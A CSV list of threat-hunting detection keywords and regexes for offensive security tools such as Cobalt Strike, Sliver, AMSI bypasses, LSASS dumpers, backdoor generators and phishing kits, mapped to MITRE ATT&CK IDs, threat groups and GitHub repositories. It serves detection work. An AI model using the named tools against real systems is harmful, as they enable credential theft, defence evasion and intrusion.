"*Already SYSTEM*not elevating*",".{0,1000}Already\sSYSTEM.{0,1000}not\selevating.{0,1000}","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/GhostPack/Koh","1","0","#content","N/A","10","10","492","66","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z","33820"
"*AlteredSecurity/365-Stealer*",".{0,1000}AlteredSecurity\/365\-Stealer.{0,1000}","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","1","N/A","N/A","10","5","488","89","2024-06-08T21:03:50Z","2020-09-20T18:22:36Z","33822"
"*AlteredSecurity/Disable-TamperProtection*",".{0,1000}AlteredSecurity\/Disable\-TamperProtection.{0,1000}","offensive_tool_keyword","Disable-TamperProtection","disable TamperProtection and other Defender / MDE components","T1562.001 - T1562.007","TA0005","N/A","N/A","Defense Evasion","https://github.com/AlteredSecurity/Disable-TamperProtection","1","1","N/A","N/A","10","3","208","35","2024-06-06T14:44:59Z","2024-06-05T12:48:56Z","33823"
"*alwaysinstallelevated.*",".{0,1000}alwaysinstallelevated\..{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1548.002 - T1134.001 - T1087.002 - T1010 - T1547.001 - T1059.001 - T1059.003 - T1059.006 - T1543.003 - T1555.003 - T1555.004 - T1546.001 - T1546.003 - T1546.015 - T1041 - T1083 - T1564.003 - T1562.001 - T1562.003 - T1070 - T1070.004 - T1105 - T1056.001 - T1056.002 - T1556 - T1112 - T1106 - T1046 - T1135 - T1003.001 - T1069.001 - T1069.002 - T1057 - T1055 - T1012 - T1021.003 - T1021.006 - T1018 - T1113 - T1518.001 - T1558.003 - T1082 - T1033 - T1007 - T1124 - T1552.006 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","N/A","10","2239","416","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z","33824"
"*alwaysinstallelevated.c*",".{0,1000}alwaysinstallelevated\.c.{0,1000}","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","N/A","9","5","405","47","2024-06-15T16:54:32Z","2023-03-20T04:19:40Z","33825"
"*alwaysinstallelevated.o*",".{0,1000}alwaysinstallelevated\.o.{0,1000}","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","N/A","9","5","405","47","2024-06-15T16:54:32Z","2023-03-20T04:19:40Z","33826"
"*am0nsec/HellsGate*",".{0,1000}am0nsec\/HellsGate.{0,1000}","offensive_tool_keyword","HellsGate","The Hell's Gate technique is a method employed by malware to hide its malicious behavior and avoid detection. This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/am0nsec/HellsGate","1","1","N/A","N/A","N/A","10","1028","121","2021-06-28T15:42:36Z","2020-06-02T17:10:21Z","33827"
"*amass enum -d *",".{0,1000}amass\senum\s\-d\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","33830"
"*amass-get-rootdomains*",".{0,1000}amass\-get\-rootdomains.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","1","N/A","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","33831"
"*amass-get-subdomains*",".{0,1000}amass\-get\-subdomains.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","1","N/A","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","33832"
"*AmberWolfCyber/NachoVPN*",".{0,1000}AmberWolfCyber\/NachoVPN.{0,1000}","offensive_tool_keyword","NachoVPN","NachoVPN is a Proof of Concept that demonstrates exploitation of SSL-VPN clients using a rogue VPN serve","T1071 - T1027 - T1547 - T1204","TA0003 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/AmberWolfCyber/NachoVPN","1","1","N/A","N/A","7","3","218","28","2024-11-28T12:40:55Z","2024-10-30T15:53:56Z","33833"
"*amibypass.exe*",".{0,1000}amibypass\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","33834"
"*amjcyber/pwnlook*",".{0,1000}amjcyber\/pwnlook.{0,1000}","offensive_tool_keyword","pwnlook","An offensive postexploitation tool that will give you complete control over the Outlook desktop application and therefore to the emails configured in it","T1114 - T1071 - T1059 - T1113 - T1123","TA0002 - TA0005 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/amjcyber/pwnlook","1","1","N/A","N/A","6","2","166","18","2024-10-09T07:50:04Z","2024-09-19T10:26:16Z","33836"
"*amkmjjmmflddogmhpjloimipbofnfjih*",".{0,1000}amkmjjmmflddogmhpjloimipbofnfjih.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","33837"
"*Amnesiac.ps1*",".{0,1000}Amnesiac\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","1","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","33841"
"*Amnesiac_ShellReady.ps1*",".{0,1000}Amnesiac_ShellReady\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1059.001 - T1078 - T1086 - T1021.002 - T1046","TA0008 - TA0003 - TA0004 - TA0005 - TA0006 - TA0009 - TA0010 - TA0011","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","1","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","33842"
"*Amnesiac-main.zip*",".{0,1000}Amnesiac\-main\.zip.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","1","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","33843"
"*AMS1-Patch.exe*",".{0,1000}AMS1\-Patch\.exe.{0,1000}","offensive_tool_keyword","AMSI_patch","Patching AmsiOpenSession by forcing an error branching","T1055 - T1055.001 - T1112","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/AMSI_patch","1","1","N/A","N/A","8","2","145","29","2023-08-02T02:27:00Z","2023-02-03T18:11:37Z","33846"
"*AMSI patched in all powershells*",".{0,1000}AMSI\spatched\sin\sall\spowershells.{0,1000}","offensive_tool_keyword","Amsi-Killer","Lifetime AMSI bypass","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Amsi-Killer","1","0","N/A","N/A","10","7","624","90","2023-09-26T00:49:22Z","2023-02-26T19:05:14Z","33847"
"*AMSI_Bypass.ps1*",".{0,1000}AMSI_Bypass\.ps1.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","Black Basta","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","N/A","10","10","806","170","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z","33848"
"*AMSI_bypass_20*.ps1",".{0,1000}AMSI_bypass_20.{0,1000}\.ps1","offensive_tool_keyword","PSSW100AVB","This is the PSSW100AVB (Powershell Scripts With 100% AV Bypass) Framework.A list of useful Powershell scripts with 100% AV bypass ratio","T1112 - T1562.001 - T1086 - T1548.002 - T1059.001","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/tihanyin/PSSW100AVB","1","1","N/A","N/A","N/A","10","1104","174","2025-01-28T10:47:44Z","2021-10-08T17:36:24Z","33849"
"*AMSI_patch-main*",".{0,1000}AMSI_patch\-main.{0,1000}","offensive_tool_keyword","AMSI_patch","Patching AmsiOpenSession by forcing an error branching","T1055 - T1055.001 - T1112","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/AMSI_patch","1","1","N/A","N/A","8","2","145","29","2023-08-02T02:27:00Z","2023-02-03T18:11:37Z","33850"
"*amsi-bypass*",".{0,1000}amsi\-bypass.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","33851"
"*AmsiBypass.cs*",".{0,1000}AmsiBypass\.cs.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/klezVirus/CheeseTools","1","1","N/A","N/A","10","8","706","143","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z","33852"
"*amsibypass.exe*",".{0,1000}amsibypass\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","33853"
"*Amsi-Killer.exe*",".{0,1000}Amsi\-Killer\.exe.{0,1000}","offensive_tool_keyword","Amsi-Killer","Lifetime AMSI bypass","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Amsi-Killer","1","1","N/A","N/A","10","7","624","90","2023-09-26T00:49:22Z","2023-02-26T19:05:14Z","33854"
"*Amsi-Killer.sln*",".{0,1000}Amsi\-Killer\.sln.{0,1000}","offensive_tool_keyword","Amsi-Killer","Lifetime AMSI bypass","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Amsi-Killer","1","1","N/A","N/A","10","7","624","90","2023-09-26T00:49:22Z","2023-02-26T19:05:14Z","33855"
"*Amsi-Killer.vcxproj*",".{0,1000}Amsi\-Killer\.vcxproj.{0,1000}","offensive_tool_keyword","Amsi-Killer","Lifetime AMSI bypass","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Amsi-Killer","1","1","N/A","N/A","10","7","624","90","2023-09-26T00:49:22Z","2023-02-26T19:05:14Z","33856"
"*Amsi-Killer-master*",".{0,1000}Amsi\-Killer\-master.{0,1000}","offensive_tool_keyword","Amsi-Killer","Lifetime AMSI bypass","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Amsi-Killer","1","1","N/A","N/A","10","7","624","90","2023-09-26T00:49:22Z","2023-02-26T19:05:14Z","33857"
"*AmsiOpenSession.cpp*",".{0,1000}AmsiOpenSession\.cpp.{0,1000}","offensive_tool_keyword","AMSI_patch","Patching AmsiOpenSession by forcing an error branching","T1055 - T1055.001 - T1112","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/AMSI_patch","1","1","N/A","N/A","8","2","145","29","2023-08-02T02:27:00Z","2023-02-03T18:11:37Z","33858"
"*AmsiOpenSession.sln*",".{0,1000}AmsiOpenSession\.sln.{0,1000}","offensive_tool_keyword","AMSI_patch","Patching AmsiOpenSession by forcing an error branching","T1055 - T1055.001 - T1112","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/AMSI_patch","1","1","N/A","N/A","8","2","145","29","2023-08-02T02:27:00Z","2023-02-03T18:11:37Z","33859"
"*AmsiOpenSession.vcxproj*",".{0,1000}AmsiOpenSession\.vcxproj.{0,1000}","offensive_tool_keyword","AMSI_patch","Patching AmsiOpenSession by forcing an error branching","T1055 - T1055.001 - T1112","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/AMSI_patch","1","1","N/A","N/A","8","2","145","29","2023-08-02T02:27:00Z","2023-02-03T18:11:37Z","33860"
"*AmsiTrigger.exe*",".{0,1000}AmsiTrigger\.exe.{0,1000}","offensive_tool_keyword","AMSITrigger","AMSITrigger will identify all of the malicious strings in a powershell file by repeatedly making calls to AMSI using AMSIScanBuffer - line by line. On receiving an AMSI_RESULT_DETECTED response code the line will then be scrutinised to identify the individual triggers","T1059.001 - T1218.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RythmStick/AMSITrigger","1","1","N/A","https://www.rythmstick.net/posts/amsitrigger/","10","10","1195","166","2022-08-21T22:37:23Z","2020-05-27T09:17:19Z","33861"
"*AMSITrigger.exe*",".{0,1000}AMSITrigger\.exe.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","1","N/A","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","33862"
"*AmsiTrigger_x64.exe*",".{0,1000}AmsiTrigger_x64\.exe.{0,1000}","offensive_tool_keyword","AMSITrigger","AMSITrigger will identify all of the malicious strings in a powershell file by repeatedly making calls to AMSI using AMSIScanBuffer - line by line. On receiving an AMSI_RESULT_DETECTED response code the line will then be scrutinised to identify the individual triggers","T1059.001 - T1218.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RythmStick/AMSITrigger","1","1","N/A","https://www.rythmstick.net/posts/amsitrigger/","10","10","1195","166","2022-08-21T22:37:23Z","2020-05-27T09:17:19Z","33863"
"*amsitrigger_x64.exe*",".{0,1000}amsitrigger_x64\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","33864"
"*AmsiTrigger_x86.exe*",".{0,1000}AmsiTrigger_x86\.exe.{0,1000}","offensive_tool_keyword","AMSITrigger","AMSITrigger will identify all of the malicious strings in a powershell file by repeatedly making calls to AMSI using AMSIScanBuffer - line by line. On receiving an AMSI_RESULT_DETECTED response code the line will then be scrutinised to identify the individual triggers","T1059.001 - T1218.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RythmStick/AMSITrigger","1","1","N/A","https://www.rythmstick.net/posts/amsitrigger/","10","10","1195","166","2022-08-21T22:37:23Z","2020-05-27T09:17:19Z","33865"
"*An interactive shell to spoof some LOLBins*",".{0,1000}An\sinteractive\sshell\sto\sspoof\ssome\sLOLBins.{0,1000}","offensive_tool_keyword","LOLSpoof","An interactive shell to spoof some LOLBins command line","T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/itaymigdal/LOLSpoof","1","0","N/A","N/A","8","2","184","24","2024-01-27T05:43:59Z","2024-01-16T20:15:38Z","33866"
"*An0nUD4Y/Evilginx2-Phishlets*",".{0,1000}An0nUD4Y\/Evilginx2\-Phishlets.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/Evilginx2-Phishlets","1","0","N/A","N/A","10","7","670","263","2025-02-06T02:46:16Z","2020-05-13T05:58:43Z","33867"
"*and Credential Guard will not be bypassed*",".{0,1000}and\sCredential\sGuard\swill\snot\sbe\sbypassed.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","COZY BEAR","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","N/A","10","3","260","48","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z","33868"
"*andotp2john.py*",".{0,1000}andotp2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","33870"
"*AndrewSpecial.cpp*",".{0,1000}AndrewSpecial\.cpp.{0,1000}","offensive_tool_keyword","AndrewSpecial","AndrewSpecial - dumping lsass memory stealthily","T1003.001 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/hoangprod/AndrewSpecial","1","1","N/A","N/A","10","4","386","98","2019-06-02T02:49:28Z","2019-01-18T19:12:09Z","33871"
"*AndrewSpecial.exe*",".{0,1000}AndrewSpecial\.exe.{0,1000}","offensive_tool_keyword","AndrewSpecial","AndrewSpecial - dumping lsass memory stealthily","T1003.001 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/hoangprod/AndrewSpecial","1","1","N/A","N/A","10","4","386","98","2019-06-02T02:49:28Z","2019-01-18T19:12:09Z","33872"
"*AndrewSpecial-master*",".{0,1000}AndrewSpecial\-master.{0,1000}","offensive_tool_keyword","AndrewSpecial","AndrewSpecial - dumping lsass memory stealthily","T1003.001 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/hoangprod/AndrewSpecial","1","1","N/A","N/A","10","4","386","98","2019-06-02T02:49:28Z","2019-01-18T19:12:09Z","33873"
"*android/meterpreter/reverse_tcp*",".{0,1000}android\/meterpreter\/reverse_tcp.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","FIN11 - FIN7 - Silence group - MuddyWater - FIN6 - GCMAN - Turla","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","33874"
"*androidbackup2john.py*",".{0,1000}androidbackup2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","33875"
"*androidfde2john.py*",".{0,1000}androidfde2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","33876"
"*AnErrupTion/LoGiC.NET*",".{0,1000}AnErrupTion\/LoGiC\.NET.{0,1000}","offensive_tool_keyword","LoGiC.NET","A more advanced free and open .NET obfuscator using dnlib","T1001","TA0011","N/A","N/A","Defense Evasion","https://github.com/AnErrupTion/LoGiC.NET","1","1","N/A","N/A","5","6","513","80","2023-08-23T09:55:54Z","2019-12-27T09:48:50Z","33877"
"*Anevicon*",".{0,1000}Anevicon.{0,1000}","offensive_tool_keyword","Anevicon","Attack simulation: Anevicon is a high-performance traffic generator. designed to be as convenient and reliable as it is possible. It sends numerous UDP-packets to a victim. thereby simulating an activity that can be produced by your end users or a group of hackers.","T1498 - T1497 - T1496","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation tool","https://github.com/rozgo/anevicon","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","33878"
"*AngelSecurityTeam/BackHAck*",".{0,1000}AngelSecurityTeam\/BackHAck.{0,1000}","offensive_tool_keyword","BackHAck","Backdoor Generator with C2 server - Linux & Windows - FUD AV .py .exe","T1090 - T1095 - T1008","TA0011","N/A","N/A","C2","https://github.com/AngelSecurityTeam/BackHAck","1","1","#linux","N/A","10","10","108","34","2020-03-25T21:30:47Z","2020-03-14T19:00:36Z","33879"
"*AngelSecurityTeam/Cam-Hackers*",".{0,1000}AngelSecurityTeam\/Cam\-Hackers.{0,1000}","offensive_tool_keyword","Cam-Hackers","Hack Cameras CCTV FREE","T1125","TA0007","N/A","N/A","Discovery","https://github.com/AngelSecurityTeam/Cam-Hackers","1","1","N/A","N/A","6","10","2025","512","2024-08-06T18:49:02Z","2019-11-16T18:49:35Z","33880"
"*AngelSecurityTeam-BackdoorLinux*",".{0,1000}AngelSecurityTeam\-BackdoorLinux.{0,1000}","offensive_tool_keyword","BackHAck","Backdoor Generator with C2 server - Linux & Windows - FUD AV .py .exe","T1090 - T1095 - T1008","TA0011","N/A","N/A","C2","https://github.com/AngelSecurityTeam/BackHAck","1","1","#linux","N/A","10","10","108","34","2020-03-25T21:30:47Z","2020-03-14T19:00:36Z","33881"
"*AngelSecurityTeam-BackdoorWindows.exe*",".{0,1000}AngelSecurityTeam\-BackdoorWindows\.exe.{0,1000}","offensive_tool_keyword","BackHAck","Backdoor Generator with C2 server - Linux & Windows - FUD AV .py .exe","T1090 - T1095 - T1008","TA0011","N/A","N/A","C2","https://github.com/AngelSecurityTeam/BackHAck","1","0","#linux","N/A","10","10","108","34","2020-03-25T21:30:47Z","2020-03-14T19:00:36Z","33882"
"*AngelSecurityTeam-BackdoorWindows.exe*",".{0,1000}AngelSecurityTeam\-BackdoorWindows\.exe.{0,1000}","offensive_tool_keyword","BackHAck","Backdoor Generator with C2 server - Linux & Windows - FUD AV .py .exe","T1090 - T1095 - T1008","TA0011","N/A","N/A","C2","https://github.com/AngelSecurityTeam/BackHAck","1","1","#linux","N/A","10","10","108","34","2020-03-25T21:30:47Z","2020-03-14T19:00:36Z","33883"
"*ANGRYPUPPY2.cna*",".{0,1000}ANGRYPUPPY2\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Bloodhound Attack Path Automation in CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/vysecurity/ANGRYPUPPY","1","1","N/A","N/A","10","10","316","87","2020-04-26T17:35:31Z","2017-07-11T14:18:07Z","33885"
"*aniqfakhrul/powerview.py*",".{0,1000}aniqfakhrul\/powerview\.py.{0,1000}","offensive_tool_keyword","powerview","PowerView.py is an alternative for the awesome original PowerView.ps1","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/aniqfakhrul/powerview.py","1","1","N/A","N/A","10","7","622","66","2025-04-22T09:01:39Z","2022-06-19T16:13:04Z","33886"
